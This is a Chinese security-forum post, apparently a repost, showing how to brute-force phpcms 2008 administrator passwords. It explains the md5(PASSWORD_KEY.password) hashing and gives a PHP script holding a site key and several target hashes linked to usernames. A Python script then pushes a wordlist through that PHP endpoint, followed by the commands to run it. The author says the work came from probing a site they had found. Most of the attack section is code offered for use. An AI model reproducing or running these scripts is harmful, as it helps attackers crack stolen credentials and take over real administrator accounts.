phpcms 2008 密码暴力破解

admin 2021年4月3日18:50:24评论99 views字数 261阅读0分52秒阅读模式

    说明下,这个确实比较蛋疼没啥意义,是在我之前检测一个站的时候发现是phpcms2008的,看了下加密方式,随便就弄了个试了下,发现代码版块帖子太少了实在不忍心干脆发来凑个数,admin别ban我ID啊,呵呵。

    phpcms2008的加密方式:

$password = md5(PASSWORD_KEY.$password);

    要暴力破解密码就必须知道这个 PASSWORD_KEY,在网站配置文件里面,然后再从数据库里把密文读出来。

    我写了个极其丑陋的php脚本(其实我不懂php,随便乱来的):

以下是引用片段:

function password($password){
$PASSWORD_KEY="wangzhifeng";
return md5($PASSWORD_KEY.$password);
}
$pass=$_GET

;
$md5pass=password($pass);
echo ("
密文
");
echo $md5pass;
echo ("
");
if ($md5pass=='0cd2aae578f41764692bd1587a10821c'){
echo ("yesigotit username:cernet md5:$md5pass password:$pass");
}
if ($md5pass=='5d9404a3765fdf30e2d339b228f7353b'){
echo ("yesigotit username:ietf79 md5:$md5pass password:$pass");
}
if ($md5pass=='e10adc3949ba59abbe56e057f20f883e'){
echo ("yesigotit username:phpcms md5:$md5pass password:$pass");
}
if ($md5pass=='1144f6bf03ed0ea3284585d12696292a'){
echo ("yesigotit username:tsinghua md5:$md5pass password:$pass");
}

//if ($md5pass=='7a05fa1036fa14a7b042ef40107b8936'){ //123456
//echo ("yesigotit username:tsinghua md5:$md5pass password:$pass");
//}
?>

    浏览器访问:/p.php?p=明文密码,然后我又写了个python脚本来批量爆破。

以下是引用片段:

#!/usr/bin/python
import urllib2
import sys
def main():
passfile=sys.argv[1]
p=file(passfile)

for password in p.readlines():
# print password
res=urllib2.urlopen("http://www.baidu.com/p.php?p="+password).read()
if 'yesigotit' in res:
print res
p.close()

if __name__=="__main__":
main()

    然后生成个字典,chmod u+x ps.py && ./ps.py pass.txt 就这个样子。其实速度还是蛮快的,多叫几个人一块来,哈哈,人肉分布式破解。

文章来源于lcx.cc:phpcms 2008 密码暴力破解

相关推荐: 全方位在互联网中保护自己第七章(上网习惯以及计算机唯一代码追踪的防范)

严重警告: 本文内容纯属业余恶搞娱乐,不牵扯任何敏感话题,文章内容真实性无从考证!本站并不赞同文中任何观点;如果读者私自非法传播、转载或进行任何触犯中国法律的行为,后果自负! 全方位在互联网中保护自己第七章(上网习惯以及计算机唯一代码追踪的防范) safe12…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:50:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpcms 2008 密码暴力破解https://cn-sec.com/archives/318778.html

发表评论

匿名网友 填写信息